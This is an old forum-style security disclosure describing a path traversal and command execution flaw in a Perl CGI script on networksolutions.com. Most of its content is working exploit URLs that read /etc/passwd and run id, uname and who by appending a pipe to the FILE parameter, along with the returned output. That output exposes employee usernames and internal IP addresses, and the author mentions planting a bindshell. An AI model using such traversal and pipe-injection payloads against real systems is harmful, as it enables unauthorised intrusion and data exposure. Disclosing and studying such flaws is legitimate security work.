networksolutions.com: www security hole. (may/9/2000) Major security issue with networksolutions.com(easysteps.pl). I was in #r00tabega, and someone relayed this(it was told to me Mr^Chaos found the orginal read bug): http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd And I so with that initial bug found, I downloaded the perl script with the bug itself. I noticed that a bigger problem existed: --- open(CURR_FILE,$finalpath) or die "EASYSTEPS: Can't open file $finalpath\n"; my @LINES = <CURR_FILE>; close(CURR_FILE); --- $finalpath is for the most part supplied by the user. Knowning that open() can be used to execute programs, I used the initial bug for this, by going to the root dir and then accessing the file I wanted to execute followed by the pipe: opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id| return: uid=60001(nobody) gid=60001(nobody) opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a| return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who| return: " matthewh pts/1 Apr 17 11:32 (216.168.238.173) rholgado pts/2 Apr 17 15:35 (216.168.235.124) schauhan pts/3 May 4 16:05 (216.168.238.21) pvirador pts/4 Apr 20 17:02 (216.168.238.21) rholgado pts/5 Apr 18 13:39 (216.168.235.124) rholgado pts/6 Apr 18 13:40 (216.168.235.124) " I decided NOT to be retarded. But, I could have wrote a bindshell to a tmp directory and connected. While looking around the system I noticed some public exploits that would have been able to get me root. I just thought this was worth commenting on of a major corp, with such a obvious bug. (I don't want to goto jail, I don't know about you.) vade79[v9@fakehalo.org] -> www.fakehalo.org